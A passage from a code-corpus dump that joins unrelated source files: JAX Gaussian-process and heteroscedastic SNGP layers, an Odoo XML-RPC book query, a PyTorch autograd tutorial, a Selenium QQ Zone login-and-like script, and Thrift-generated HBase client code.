nn.LayerNorm. norm_kwargs: Optional keyword arguments to the input nn.LayerNorm layer. hidden_kwargs: Optional keyword arguments to the random feature layer. output_kwargs: Optional keyword arguments to the predictive logit layer. covmat_kwargs: Optional keyword arguments to the predictive covmat layer. """ features: int hidden_features: int = 1024 normalize_input: bool = True # Optional keyword arguments. norm_kwargs: Mapping[str, Any] = default_kwarg_dict() hidden_kwargs: Mapping[str, Any] = default_kwarg_dict() output_kwargs: Mapping[str, Any] = default_kwarg_dict() covmat_kwargs: Mapping[str, Any] = default_kwarg_dict() def setup(self): """Defines model layers.""" # pylint:disable=invalid-name,not-a-mapping if self.normalize_input: # Prefer a parameter-free version of LayerNorm by default [2]. Can be # overwritten by passing norm_kwargs=dict(use_bias=..., use_scales=...). LayerNorm = functools.partial( nn.LayerNorm, use_bias=False, use_scale=False) self.norm_layer = LayerNorm(**self.norm_kwargs) self.hidden_layer = RandomFourierFeatures( features=self.hidden_features, **self.hidden_kwargs) self.output_layer = nn.Dense(features=self.features, **self.output_kwargs) self.covmat_layer = LaplaceRandomFeatureCovariance( hidden_features=self.hidden_features, **self.covmat_kwargs) # pylint:enable=invalid-name,not-a-mapping def __call__(self, inputs: Array, return_full_covmat: bool = False, return_random_features: bool = False) -> Array: """Computes Gaussian process outputs. Args: inputs: the nd-array of shape (batch_size, ..., input_dim). return_full_covmat: whether to return the full covariance matrix, shape (batch_size, batch_size), or only return the predictive variances with shape (batch_size, ). return_random_features: whether to return the random fourier features for the inputs. Returns: A tuple of predictive logits, predictive covmat and (optionally) random Fourier features. """ gp_inputs = self.norm_layer(inputs) if self.normalize_input else inputs gp_features = self.hidden_layer(gp_inputs) gp_logits = self.output_layer(gp_features) gp_covmat = self.covmat_layer( gp_features, gp_logits, diagonal_only=not return_full_covmat) # Returns predictive logits, covmat and (optionally) random features. if return_random_features: return gp_logits, gp_covmat, gp_features return gp_logits, gp_covmat class RandomFourierFeatures(nn.Module): """A random fourier feature (RFF) layer that approximates a kernel model. The random feature transformation is a one-hidden-layer network with non-trainable weights (see, e.g., Algorithm 1 of [3]). Specifically: f(x) = activation(x @ kernel + bias) * output_scale. The forward pass logic closely follows that of the nn.Dense. Attributes: features: the number of output units. feature_scalefeature_scale: scale to apply to the output (default: sqrt(2. / features), see Algorithm 1 of [3]). activation: activation function to apply to the output. kernel_init: initializer function for the weight matrix. bias_init: initializer function for the bias. seed: random seed for generating random features (default: 0). This will override the external RNGs. dtype: the dtype of the computation (default: float32). """ features: int feature_scale: Optional[jnp.float32] = 1. activation: Callable[[Array], Array] = default_rbf_activation kernel_init: Initializer = default_rbf_kernel_init bias_init: Initializer = default_rbf_bias_init seed: int = 0 dtype: Dtype = jnp.float32 collection_name: str = 'random_features' def setup(self): # Defines the random number generator. self.rng = random.PRNGKey(self.seed) # Processes random feature scale. self._feature_scale = self.feature_scale if self._feature_scale is None: self._feature_scale = jnp.sqrt(2. / self.features) self._feature_scale = jnp.asarray(self._feature_scale, dtype=self.dtype) @nn.compact def __call__(self, inputs: Array) -> Array: """Applies random feature transformation along the last dimension of inputs. Args: inputs: The nd-array to be transformed. Returns: The transformed input. """ # Initializes variables. input_dim = inputs.shape[-1] kernel_rng, bias_rng = random.split(self.rng, num=2) kernel_shape = (input_dim, self.features) kernel = self.variable(self.collection_name, 'kernel', self.kernel_init, kernel_rng, kernel_shape, self.dtype) bias = self.variable(self.collection_name, 'bias', self.bias_init, bias_rng, (self.features,), self.dtype) # Specifies multiplication dimension. contracting_dims = ((inputs.ndim - 1,), (0,)) batch_dims = ((), ()) # Performs forward pass. inputs = jnp.asarray(inputs, self.dtype) outputs = lax.dot_general(inputs, kernel.value, (contracting_dims, batch_dims)) outputs = outputs + jnp.broadcast_to(bias.value, outputs.shape) return self._feature_scale * self.activation(outputs) class LaplaceRandomFeatureCovariance(nn.Module): """Computes the Gaussian Process covariance using Laplace method. Attributes: hidden_features: the number of random fourier features. ridge_penalty: Initial Ridge penalty to weight covariance matrix. This value is used to stablize the eigenvalues of weight covariance estimate so that the matrix inverse can be computed for Cov = inv(t(X) @ X + s * I). The ridge factor s cannot be too large since otherwise it will dominate the t(X) * X term and make covariance estimate not meaningful. momentum: A discount factor used to compute the moving average for posterior precision matrix. Analogous to the momentum factor in batch normalization. If `None` then update covariance matrix using a naive sum without momentum, which is desirable if the goal is to compute the exact covariance matrix by passing through data once (say in the final epoch). In this case, make sure to reset the precision matrix variable between epochs by replacing it with self.initial_precision_matrix(). likelihood: The likelihood to use for computing Laplace approximation for the covariance matrix. Can be one of ('binary_logistic', 'poisson', 'gaussian'). """ hidden_features: int ridge_penalty: float = 1. momentum: Optional[float] = None likelihood: str = 'gaussian' collection_name: str = 'laplace_covariance' dtype: Dtype = jnp.float32 def setup(self): if self.momentum is not None: if self.momentum < 0. or self.momentum > 1.: raise ValueError(f'`momentum` must be between (0, 1). ' f'Got {self.momentum}.') if self.likelihood not in SUPPORTED_LIKELIHOOD: raise ValueError(f'"likelihood" must be one of {SUPPORTED_LIKELIHOOD}, ' f'got {self.likelihood}.') @nn.compact def __call__(self, gp_features: Array, gp_logits: Optional[Array] = None, diagonal_only: bool = True) -> Optional[Array]: """Updates the precision matrix and computes the predictive covariance. NOTE: The precision matrix will be updated only during training (i.e., when `self.collection_name` are in the list of mutable variables). The covariance matrix will be computed only during inference to avoid repeated calls to the (expensive) `linalg.inv` op. Args: gp_features: The nd-array of random fourier features, shape (batch_size, ..., hidden_features). gp_logits: The nd-array of predictive logits, shape (batch_size, ..., logit_dim). Cannot be None if self.likelihood is not `gaussian`. diagonal_only: Whether to return only the diagonal elements of the predictive covariance matrix (i.e., the predictive variance). Returns: The predictive variances of shape (batch_size, ) if diagonal_only=True, otherwise the predictive covariance matrix of shape (batch_size, batch_size). """ gp_features = jnp.asarray(gp_features, self.dtype) # Flatten GP features and logits to 2-d, by doing so we treat all the # non-final dimensions as the batch dimensions. gp_features = jnp.reshape(gp_features, [-1, self.hidden_features]) if gp_logits is not None: gp_logits = jnp.asarray(gp_logits, self.dtype) gp_logits = jnp.reshape(gp_logits, [gp_features.shape[0], -1]) precision_matrix = self.variable(self.collection_name, 'precision_matrix', lambda: self.initial_precision_matrix()) # pylint: disable=unnecessary-lambda # Updates the precision matrix during training. initializing = self.is_mutable_collection('params') training = self.is_mutable_collection(self.collection_name) if training and not initializing: precision_matrix.value = self.update_precision_matrix( gp_features, gp_logits, precision_matrix.value) # Computes covariance matrix during inference. if not training: return self.compute_predictive_covariance(gp_features, precision_matrix, diagonal_only) def initial_precision_matrix(self): """Returns the initial diagonal precision matrix.""" return jnp.eye(self.hidden_features, dtype=self.dtype) * self.ridge_penalty def update_precision_matrix(self, gp_features: Array, gp_logits: Optional[Array], precision_matrix: Array) -> Array: """Updates precision matrix given a new batch. Args: gp_features: random features from the new batch, shape (batch_size, hidden_features) gp_logits: predictive logits from the new batch, shape (batch_size, logit_dim). Currently only logit_dim=1 is supported. precision_matrix: the current precision matrix, shape (hidden_features, hidden_features). Returns: Updated precision matrix, shape (hidden_features, hidden_features). Raises: (ValueError) If the logit is None or not univariate when likelihood is not Gaussian. """ if self.likelihood != 'gaussian': if gp_logits is None: raise ValueError( f'`gp_logits` cannot be None when likelihood=`{self.likelihood}`') if gp_logits.ndim > 1 and gp_logits.shape[-1] != 1: raise ValueError( f'likelihood `{self.likelihood}` only support univariate logits. ' f'Got logits dimension: {gp_logits.shape[-1]}') # Computes precision matrix within new batch. if self.likelihood == 'binary_logistic': prob = nn.sigmoid(gp_logits) prob_multiplier = prob * (1. - prob) elif self.likelihood == 'poisson': prob_multiplier = jnp.exp(gp_logits) else: prob_multiplier = 1. gp_features_adj = jnp.sqrt(prob_multiplier) * gp_features batch_prec_mat = jnp.matmul(jnp.transpose(gp_features_adj), gp_features_adj) # Updates precision matrix. if self.momentum is None: # Performs exact update without momentum. precision_matrix_updated = precision_matrix + batch_prec_mat else: batch_size = gp_features.shape[0] precision_matrix_updated = ( self.momentum * precision_matrix + (1 - self.momentum) * batch_prec_mat / batch_size) return precision_matrix_updated def compute_predictive_covariance(self, gp_features: Array, precision_matrix: nn.Variable, diagonal_only: bool) -> Array: """Computes the predictive covariance. Approximates the Gaussian process posterior using random features. Given training random feature Phi_tr (num_train, num_hidden) and testing random feature Phi_ts (batch_size, num_hidden). The predictive covariance matrix is computed as (assuming Gaussian likelihood): s * Phi_ts @ inv(t(Phi_tr) * Phi_tr + s * I) @ t(Phi_ts), where s is the ridge factor to be used for stablizing the inverse, and I is the identity matrix with shape (num_hidden, num_hidden). Args: gp_features: the random feature of testing data to be used for computing the covariance matrix. Shape (batch_size, gp_hidden_size). precision_matrix: the model's precision matrix. diagonal_only: whether to return only the diagonal elements of the predictive covariance matrix (i.e., the predictive variances). Returns: The predictive variances of shape (batch_size, ) if diagonal_only=True, otherwise the predictive covariance matrix of shape (batch_size, batch_size). """ precision_matrix_inv = jnp.linalg.inv(precision_matrix.value) cov_feature_product = jnp.matmul(precision_matrix_inv, jnp.transpose(gp_features)) if diagonal_only: # Compute diagonal element only, shape (batch_size, ). # Using the identity diag(A @ B) = col_sum(A * tr(B)). gp_covar = jnp.sum( gp_features * jnp.transpose(cov_feature_product), axis=-1) else: # Compute full covariance matrix, shape (batch_size, batch_size). gp_covar = jnp.matmul(gp_features, cov_feature_product) return self.ridge_penalty * gp_covar class MCSigmoidDenseFASNGP(nn.Module): """Heteroscedastic SNGP for data with sigmoid output activation. Output layer which combines the benefits of the heteroscedastic (https://arxiv.org/abs/2105.10305) and SNGP (https://arxiv.org/abs/2006.10108) methods. Assumes spectral normalization is applied to network producing `inputs` to the __call__ method. Attributes: num_outputs: Number of outputs for classification task. num_factors: Number of factors to use in approximation to full rank covariance matrix. temperature: The softmax temperature. parameter_efficient: Whether to use the parameter efficient version of the method. If True then samples from the latent distribution are generated as: mu(x) + v(x) * matmul(V, eps_R) + diag(d(x), eps_K)), where eps_R ~ N(0, I_R), eps_K ~ N(0, I_K). If False then latent samples are generated as: mu(x) + matmul(V(x), eps_R) + diag(d(x), eps_K)). Computing V(x) as function of x increases the number of parameters introduced by the method. train_mc_samples: The number of Monte-Carlo samples used to estimate the predictive distribution during training. test_mc_samples: The number of Monte-Carlo samples used to estimate the predictive distribution during testing/inference. share_samples_across_batch: If True, the latent noise samples are shared across batch elements. If encountering XLA compilation errors due to dynamic shape inference setting = True may solve. logits_only: If True, only return the logits from the __call__ method. return_locs: If True, return the location parameter of the Gaussian latent variable in place of the `logits`. eps: Clip probabilities into [eps, 1.0] before applying log. het_var_weight: Weighting on the heteroscedastic variance when computing samples from the Gaussian latent variable. sngp_var_weight: Weighting on the GP variance when computing samples from the Gaussian latent variable. hidden_features: Number of features for Random Fourier Feature GP approximation. normalize_input: Whether to normalize the input for the GP layer. norm_kwargs: Normalization keywords for the GP layer. hidden_kwargs: Hidden layer keywords for the GP layer. output_kwargs: Output keywords for the GP layer. covmat_kwargs: Covariance matrix keywords for the GP layer. """ num_outputs: int num_factors: int # set num_factors = 0 for diagonal method temperature: float = 1.0 parameter_efficient: bool = False train_mc_samples: int = 1000 test_mc_samples: int = 1000 share_samples_across_batch: bool = False logits_only: bool = False return_locs: bool = False eps: float = 1e-7 het_var_weight: float = 1.0 sngp_var_weight: float = 0.0 hidden_features: int = 1024 normalize_input: bool = True # Optional keyword arguments. norm_kwargs: Mapping[str, Any] = default_kwarg_dict() hidden_kwargs: Mapping[str, Any] = default_kwarg_dict() output_kwargs: Mapping[str, Any] = default_kwarg_dict() covmat_kwargs: Mapping[str, Any] = default_kwarg_dict() def setup(self): if self.parameter_efficient: self._scale_layer_homoscedastic = nn.Dense( self.num_outputs, name='scale_layer_homoscedastic') self._scale_layer_heteroscedastic = nn.Dense( self.num_outputs, name='scale_layer_heteroscedastic') elif self.num_factors > 0: self._scale_layer = nn.Dense( self.num_outputs * self.num_factors, name='scale_layer') self._loc_layer = RandomFeatureGaussianProcess( features=self.num_outputs, hidden_features=self.hidden_features, normalize_input=self.normalize_input, norm_kwargs=self.norm_kwargs, hidden_kwargs=self.hidden_kwargs, output_kwargs=self.output_kwargs, covmat_kwargs=self.covmat_kwargs, name='loc_layer') self._diag_layer = nn.Dense(self.num_outputs, name='diag_layer') def _compute_loc_param(self, inputs: Array) -> Array: """Computes location parameter of the "logits distribution". Args: inputs: The input to the heteroscedastic output layer. Returns: Array of shape [batch_size, num_classes]. """ return self._loc_layer(inputs) def _compute_scale_param(self, inputs: Array, covmat_sngp: Array, training: int) -> Tuple[Array, Array]: """Computes scale parameter of the "logits distribution". Args: inputs: The input to the heteroscedastic output layer. covmat_sngp: GP output layer covariance matrix. training: in training mode or not. Returns: 2-Tuple of Array of shape ([batch_size, num_classes * max(num_factors, 1)], [batch_size, num_classes]). """ if self.parameter_efficient or self.num_factors <= 0: low_rank = inputs diag = jax.nn.softplus(self._diag_layer(inputs)) + MIN_SCALE_MONTE_CARLO else: low_rank = self._scale_layer(inputs) diag = jax.nn.softplus(self._diag_layer(inputs)) + MIN_SCALE_MONTE_CARLO initializing = self.is_mutable_collection('params') if training or initializing: diag_comp = diag else: # assume diagonal_only=True sngp_marginal_vars = jnp.expand_dims(covmat_sngp, -1) diag_comp = jnp.sqrt(self.het_var_weight * jnp.square(diag) + self.sngp_var_weight * sngp_marginal_vars) return low_rank, diag_comp def _compute_diagonal_noise_samples(self, diag_scale: Array, num_samples: int) -> Array: """Computes samples of the diagonal elements logit noise. Args: diag_scale: Array of shape [batch_size, num_classes]. Diagonal elements of scale parameters of the distribution to be sampled. num_samples: Number of Monte-Carlo samples to take. Returns: Array. Logit noise samples of shape: [batch_size, num_samples, num_outputs]. """ if self.share_samples_across_batch: samples_per_batch = 1 else: samples_per_batch = diag_scale.shape[0] key = self.make_rng('diag_noise_samples') return jnp.expand_dims(diag_scale, 1) * jax.random.normal( key, shape=(samples_per_batch, num_samples, 1)) def _compute_standard_normal_samples(self, factor_loadings: Array, num_samples: int) -> Array: """Utility that computes samples from a standard normal distribution. Args: factor_loadings: Array of shape [batch_size, num_classes * num_factors]. Factor loadings for scale parameters of the distribution to be sampled. num_samples: Number of Monte-Carlo samples to take. Returns: Array. Samples of shape: [batch_size, num_samples, num_factors]. """ if self.share_samples_across_batch: samples_per_batch = 1 else: samples_per_batch = factor_loadings.shape[0] key = self.make_rng('standard_norm_noise_samples') standard_normal_samples = jax.random.normal( key, shape=(samples_per_batch, num_samples, self.num_factors)) if self.share_samples_across_batch: standard_normal_samples = jnp.tile(standard_normal_samples, [factor_loadings.shape[0], 1, 1]) return standard_normal_samples def _compute_noise_samples(self, scale: Tuple[Array, Array], num_samples: int) -> Array: """Utility function that computes additive noise samples. Args: scale: Tuple of Array of shape ( [batch_size, num_classes * num_factors], [batch_size, num_classes]). Factor loadings and diagonal elements for scale parameters of the distribution to be sampled. num_samples: Number of Monte-Carlo samples to take. Returns: Array. Logit noise samples of shape: [batch_size, num_samples, num_outputs]. """ factor_loadings, diag_scale = scale # Compute the diagonal noise diag_noise_samples = self._compute_diagonal_noise_samples(diag_scale, num_samples) if self.num_factors > 0: # Now compute the factors standard_normal_samples = self._compute_standard_normal_samples( factor_loadings, num_samples) if self.parameter_efficient: res = self._scale_layer_homoscedastic(standard_normal_samples) res *= jnp.expand_dims( self._scale_layer_heteroscedastic(factor_loadings), 1) else: # reshape scale vector into factor loadings matrix factor_loadings = jnp.reshape(factor_loadings, [-1, self.num_outputs, self.num_factors]) # transform standard normal into ~ full rank covariance Gaussian samples res = jnp.einsum('ijk,iak->iaj', factor_loadings, standard_normal_samples) return res + diag_noise_samples return diag_noise_samples def _compute_mc_samples(self, locs: Array, scale: Array, num_samples: int) -> Array: """Utility function that computes Monte-Carlo samples (using sigmoid). Args: locs: Array of shape [batch_size, total_mc_samples, num_outputs]. Location parameters of the distributions to be sampled. scale: Array of shape [batch_size, total_mc_samples, num_outputs]. Scale parameters of the distributions to be sampled. num_samples: Number of Monte-Carlo samples to take. Returns: Array of shape [batch_size, num_samples, num_outputs]. Average over the MC samples. """ locs = jnp.expand_dims(locs, axis=1) noise_samples = self._compute_noise_samples(scale, num_samples) latents = locs + noise_samples samples = jax.nn.sigmoid(latents / self.temperature) return jnp.mean(samples, axis=1) @nn.compact def __call__(self, inputs: Array, training: int = True) -> Union[ Tuple[Array, Array], Tuple[Array, Array, Array, Array]]: """Computes predictive and log predictive distributions. Uses Monte Carlo estimate of sigmoid approximation to HetSNGP model to compute predictive distribution. Args: inputs: The input to the heteroscedastic output layer. training: Whether we are training or not. Returns: Tuple of Array: (logits, covmat_sngp) if logits_only = True. Otherwise, tuple of (logits, covmat_sngp, log_probs, probs). Logits represents the argument to a sigmoid function that would yield probs (logits = inverse_sigmoid(probs)), so logits can be used with the sigmoid cross-entropy loss function. """ # return_random_features set to False, so guaranteed to return 2-tuple locs, covmat_sngp = self._compute_loc_param(inputs) # pylint: disable=assignment-from-none,unbalanced-tuple-unpacking # guaranteed to return 2-tuple due to scale_layer construction scale = self._compute_scale_param(inputs, covmat_sngp, training) # pylint: disable=assignment-from-none if training: total_mc_samples = self.train_mc_samples else: total_mc_samples = self.test_mc_samples probs_mean = self._compute_mc_samples(locs, scale, total_mc_samples) probs_mean = jnp.clip(probs_mean, a_min=self.eps) log_probs = jnp.log(probs_mean) # inverse sigmoid probs_mean = jnp.clip(probs_mean, a_min=self.eps, a_max=1.0 - self.eps) logits = log_probs - jnp.log(1.0 - probs_mean) if self.return_locs: logits = locs if self.logits_only: return logits, covmat_sngp return logits, covmat_sngp, log_probs, probs_mean
Chapter20/02_xmlrpc_fetch_data/books_data2.py
PacktPublishing/-Odoo-13-Development-Cookbook-Fouth-Edition
125
12748342
<filename>Chapter20/02_xmlrpc_fetch_data/books_data2.py from xmlrpc import client # books data with search_read method server_url = 'http://localhost:8069' db_name = 'book-db-14' username = 'admin' password = '<PASSWORD>' common = client.ServerProxy('%s/xmlrpc/2/common' % server_url) user_id = common.authenticate(db_name, username, password, {}) models = client.ServerProxy('%s/xmlrpc/2/object' % server_url) if user_id: search_domain = ['|', ['name', 'ilike', 'odoo'], ['name', 'ilike', 'sql']] books_ids = models.execute_kw(db_name, user_id, password, 'library.book', 'search_read', [search_domain, ['name', 'date_release']], {'limit': 5}) print('Books data:', books_ids) else: print('Wrong credentials')
beginner_source/former_torchies/autograd_tutorial_old.py
Ismail-Mustapha/tutorials
6,424
12748343
<gh_stars>1000+ # -*- coding: utf-8 -*- """ Autograd ======== Autograd is now a core torch package for automatic differentiation. It uses a tape based system for automatic differentiation. In the forward phase, the autograd tape will remember all the operations it executed, and in the backward phase, it will replay the operations. Tensors that track history -------------------------- In autograd, if any input ``Tensor`` of an operation has ``requires_grad=True``, the computation will be tracked. After computing the backward pass, a gradient w.r.t. this tensor is accumulated into ``.grad`` attribute. There’s one more class which is very important for autograd implementation - a ``Function``. ``Tensor`` and ``Function`` are interconnected and build up an acyclic graph, that encodes a complete history of computation. Each variable has a ``.grad_fn`` attribute that references a function that has created a function (except for Tensors created by the user - these have ``None`` as ``.grad_fn``). If you want to compute the derivatives, you can call ``.backward()`` on a ``Tensor``. If ``Tensor`` is a scalar (i.e. it holds a one element tensor), you don’t need to specify any arguments to ``backward()``, however if it has more elements, you need to specify a ``grad_output`` argument that is a tensor of matching shape. """ import torch ############################################################### # Create a tensor and set requires_grad=True to track computation with it x = torch.ones(2, 2, requires_grad=True) print(x) ############################################################### # print(x.data) ############################################################### # print(x.grad) ############################################################### # print(x.grad_fn) # we've created x ourselves ############################################################### # Do an operation of x: y = x + 2 print(y) ############################################################### # y was created as a result of an operation, # so it has a grad_fn print(y.grad_fn) ############################################################### # More operations on y: z = y * y * 3 out = z.mean() print(z, out) ################################################################ # ``.requires_grad_( ... )`` changes an existing Tensor's ``requires_grad`` # flag in-place. The input flag defaults to ``True`` if not given. a = torch.randn(2, 2) a = ((a * 3) / (a - 1)) print(a.requires_grad) a.requires_grad_(True) print(a.requires_grad) b = (a * a).sum() print(b.grad_fn) ############################################################### # Gradients # --------- # # let's backprop now and print gradients d(out)/dx out.backward() print(x.grad) ############################################################### # By default, gradient computation flushes all the internal buffers # contained in the graph, so if you even want to do the backward on some # part of the graph twice, you need to pass in ``retain_variables = True`` # during the first pass. x = torch.ones(2, 2, requires_grad=True) y = x + 2 y.backward(torch.ones(2, 2), retain_graph=True) # the retain_variables flag will prevent the internal buffers from being freed print(x.grad) ############################################################### # z = y * y print(z) ############################################################### # # just backprop random gradients gradient = torch.randn(2, 2) # this would fail if we didn't specify # that we want to retain variables y.backward(gradient) print(x.grad) ############################################################### # You can also stop autograd from tracking history on Tensors # with requires_grad=True by wrapping the code block in # ``with torch.no_grad():`` print(x.requires_grad) print((x ** 2).requires_grad) with torch.no_grad(): print((x ** 2).requires_grad)
qqzone/qq_zone.py
rua-aaa/awesome-python-login-model
5,857
12748357
<reponame>rua-aaa/awesome-python-login-model #!/usr/bin/env python # -*- coding: utf-8 -*- """ info: author:CriseLYJ github:https://github.com/CriseLYJ/ update_time:2019-3-7 """ import time # 用来延时 from selenium import webdriver driver = webdriver.Chrome() # 选择浏览器,此处我选择的Chrome QQ_NUMBER = input('请输入你的QQ号') PASSWORD = input('<PASSWORD>') driver.get('http://i.qq.com/') driver.switch_to.frame('login_frame') driver.find_element_by_id('switcher_plogin').click() driver.find_element_by_name('u').clear() driver.find_element_by_name('u').send_keys(QQ_NUMBER) # 此处输入你的QQ号 driver.find_element_by_name('p').clear() driver.find_element_by_name('p').send_keys(PASSWORD) # 此处输入你的QQ密码 driver.execute_script("document.getElementById('login_button').parentNode.hidefocus=false;") driver.find_element_by_xpath('//*[@id="loginform"]/div[4]/a').click() driver.find_element_by_id('login_button').click() time.sleep(10) # 因为我曾经是QQ会员,所以每次登陆时都会提醒我要不要再续费的弹窗... driver.find_element_by_id('dialog_button_1').click() # 这个地方是我把那个弹窗给点击了,配合上面的延时用的,延时是等待那个弹窗出现,然后此处点击取消 btns = driver.find_elements_by_css_selector('a.item.qz_like_btn_v3') # 此处是CSS选择器 for btn in btns: btn.click()
core/sqf/src/seatrans/hbase-trx/src/main/python/thrift2/gen-py/hbase/THBaseService.py
CoderSong2015/Apache-Trafodion
148
12748386
<gh_stars>100-1000 # # Autogenerated by Thrift Compiler (0.9.0) # # DO NOT EDIT UNLESS YOU ARE SURE THAT YOU KNOW WHAT YOU ARE DOING # # options string: py # from thrift.Thrift import TType, TMessageType, TException, TApplicationException from ttypes import * from thrift.Thrift import TProcessor from thrift.transport import TTransport from thrift.protocol import TBinaryProtocol, TProtocol try: from thrift.protocol import fastbinary except: fastbinary = None class Iface: def exists(self, table, get): """ Test for the existence of columns in the table, as specified in the TGet. @return true if the specified TGet matches one or more keys, false if not Parameters: - table: the table to check on - get: the TGet to check for """ pass def get(self, table, get): """ Method for getting data from a row. If the row cannot be found an empty Result is returned. This can be checked by the empty field of the TResult @return the result Parameters: - table: the table to get from - get: the TGet to fetch """ pass def getMultiple(self, table, gets): """ Method for getting multiple rows. If a row cannot be found there will be a null value in the result list for that TGet at the same position. So the Results are in the same order as the TGets. Parameters: - table: the table to get from - gets: a list of TGets to fetch, the Result list will have the Results at corresponding positions or null if there was an error """ pass def put(self, table, put): """ Commit a TPut to a table. Parameters: - table: the table to put data in - put: the TPut to put """ pass def checkAndPut(self, table, row, family, qualifier, value, put): """ Atomically checks if a row/family/qualifier value matches the expected value. If it does, it adds the TPut. @return true if the new put was executed, false otherwise Parameters: - table: to check in and put to - row: row to check - family: column family to check - qualifier: column qualifier to check - value: the expected value, if not provided the check is for the non-existence of the column in question - put: the TPut to put if the check succeeds """ pass def putMultiple(self, table, puts): """ Commit a List of Puts to the table. Parameters: - table: the table to put data in - puts: a list of TPuts to commit """ pass def deleteSingle(self, table, deleteSingle): """ Deletes as specified by the TDelete. Note: "delete" is a reserved keyword and cannot be used in Thrift thus the inconsistent naming scheme from the other functions. Parameters: - table: the table to delete from - deleteSingle: the TDelete to delete """ pass def deleteMultiple(self, table, deletes): """ Bulk commit a List of TDeletes to the table. Throws a TIOError if any of the deletes fail. Always returns an empty list for backwards compatibility. Parameters: - table: the table to delete from - deletes: list of TDeletes to delete """ pass def checkAndDelete(self, table, row, family, qualifier, value, deleteSingle): """ Atomically checks if a row/family/qualifier value matches the expected value. If it does, it adds the delete. @return true if the new delete was executed, false otherwise Parameters: - table: to check in and delete from - row: row to check - family: column family to check - qualifier: column qualifier to check - value: the expected value, if not provided the check is for the non-existence of the column in question - deleteSingle: the TDelete to execute if the check succeeds """ pass def increment(self, table, increment): """ Parameters: - table: the table to increment the value on - increment: the TIncrement to increment """ pass def openScanner(self, table, scan): """ Get a Scanner for the provided TScan object. @return Scanner Id to be used with other scanner procedures Parameters: - table: the table to get the Scanner for - scan: the scan object to get a Scanner for """ pass def getScannerRows(self, scannerId, numRows): """ Grabs multiple rows from a Scanner. @return Between zero and numRows TResults Parameters: - scannerId: the Id of the Scanner to return rows from. This is an Id returned from the openScanner function. - numRows: number of rows to return """ pass def closeScanner(self, scannerId): """ Closes the scanner. Should be called if you need to close the Scanner before all results are read. Exhausted scanners are closed automatically. Parameters: - scannerId: the Id of the Scanner to close * """ pass class Client(Iface): def __init__(self, iprot, oprot=None): self._iprot = self._oprot = iprot if oprot is not None: self._oprot = oprot self._seqid = 0 def exists(self, table, get): """ Test for the existence of columns in the table, as specified in the TGet. @return true if the specified TGet matches one or more keys, false if not Parameters: - table: the table to check on - get: the TGet to check for """ self.send_exists(table, get) return self.recv_exists() def send_exists(self, table, get): self._oprot.writeMessageBegin('exists', TMessageType.CALL, self._seqid) args = exists_args() args.table = table args.get = get args.write(self._oprot) self._oprot.writeMessageEnd() self._oprot.trans.flush() def recv_exists(self, ): (fname, mtype, rseqid) = self._iprot.readMessageBegin() if mtype == TMessageType.EXCEPTION: x = TApplicationException() x.read(self._iprot) self._iprot.readMessageEnd() raise x result = exists_result() result.read(self._iprot) self._iprot.readMessageEnd() if result.success is not None: return result.success if result.io is not None: raise result.io raise TApplicationException(TApplicationException.MISSING_RESULT, "exists failed: unknown result"); def get(self, table, get): """ Method for getting data from a row. If the row cannot be found an empty Result is returned. This can be checked by the empty field of the TResult @return the result Parameters: - table: the table to get from - get: the TGet to fetch """ self.send_get(table, get) return self.recv_get() def send_get(self, table, get): self._oprot.writeMessageBegin('get', TMessageType.CALL, self._seqid) args = get_args() args.table = table args.get = get args.write(self._oprot) self._oprot.writeMessageEnd() self._oprot.trans.flush() def recv_get(self, ): (fname, mtype, rseqid) = self._iprot.readMessageBegin() if mtype == TMessageType.EXCEPTION: x = TApplicationException() x.read(self._iprot) self._iprot.readMessageEnd() raise x result = get_result() result.read(self._iprot) self._iprot.readMessageEnd() if result.success is not None: return result.success if result.io is not None: raise result.io raise TApplicationException(TApplicationException.MISSING_RESULT, "get failed: unknown result"); def getMultiple(self, table, gets): """ Method for getting multiple rows. If a row cannot be found there will be a null value in the result list for that TGet at the same position. So the Results are in the same order as the TGets. Parameters: - table: the table to get from - gets: a list of TGets to fetch, the Result list will have the Results at corresponding positions or null if there was an error """ self.send_getMultiple(table, gets) return self.recv_getMultiple() def send_getMultiple(self, table, gets): self._oprot.writeMessageBegin('getMultiple', TMessageType.CALL, self._seqid) args = getMultiple_args() args.table = table args.gets = gets args.write(self._oprot) self._oprot.writeMessageEnd() self._oprot.trans.flush() def recv_getMultiple(self, ): (fname, mtype, rseqid) = self._iprot.readMessageBegin() if mtype == TMessageType.EXCEPTION: x = TApplicationException() x.read(self._iprot) self._iprot.readMessageEnd() raise x result = getMultiple_result() result.read(self._iprot) self._iprot.readMessageEnd() if result.success is not None: return result.success if result.io is not None: raise result.io raise TApplicationException(TApplicationException.MISSING_RESULT, "getMultiple failed: unknown result"); def put(self, table, put): """ Commit a TPut to a table. Parameters: - table: the table to put data in - put: the TPut to put """ self.send_put(table, put) self.recv_put() def send_put(self, table, put): self._oprot.writeMessageBegin('put', TMessageType.CALL, self._seqid) args = put_args() args.table = table args.put = put args.write(self._oprot) self._oprot.writeMessageEnd() self._oprot.trans.flush() def recv_put(self, ): (fname, mtype, rseqid) = self._iprot.readMessageBegin() if mtype == TMessageType.EXCEPTION: x = TApplicationException() x.read(self._iprot) self._iprot.readMessageEnd() raise x result = put_result() result.read(self._iprot) self._iprot.readMessageEnd() if result.io is not None: raise result.io return def checkAndPut(self, table, row, family, qualifier, value, put): """ Atomically checks if a row/family/qualifier value matches the expected value. If it does, it adds the TPut. @return true if the new put was executed, false otherwise Parameters: - table: to check in and put to - row: row to check - family: column family to check - qualifier: column qualifier to check - value: the expected value, if not provided the check is for the non-existence of the column in question - put: the TPut to put if the check succeeds """ self.send_checkAndPut(table, row, family, qualifier, value, put) return self.recv_checkAndPut() def send_checkAndPut(self, table, row, family, qualifier, value, put): self._oprot.writeMessageBegin('checkAndPut', TMessageType.CALL, self._seqid) args = checkAndPut_args() args.table = table args.row = row args.family = family args.qualifier = qualifier args.value = value args.put = put args.write(self._oprot) self._oprot.writeMessageEnd() self._oprot.trans.flush() def recv_checkAndPut(self, ): (fname, mtype, rseqid) = self._iprot.readMessageBegin() if mtype == TMessageType.EXCEPTION: x = TApplicationException() x.read(self._iprot) self._iprot.readMessageEnd() raise x result = checkAndPut_result() result.read(self._iprot) self._iprot.readMessageEnd() if result.success is not None: return result.success if result.io is not None: raise result.io raise TApplicationException(TApplicationException.MISSING_RESULT, "checkAndPut failed: unknown result"); def putMultiple(self, table, puts): """ Commit a List of Puts to the table. Parameters: - table: the table to put data in - puts: a list of TPuts to commit """ self.send_putMultiple(table, puts) self.recv_putMultiple() def send_putMultiple(self, table, puts): self._oprot.writeMessageBegin('putMultiple', TMessageType.CALL, self._seqid) args = putMultiple_args() args.table = 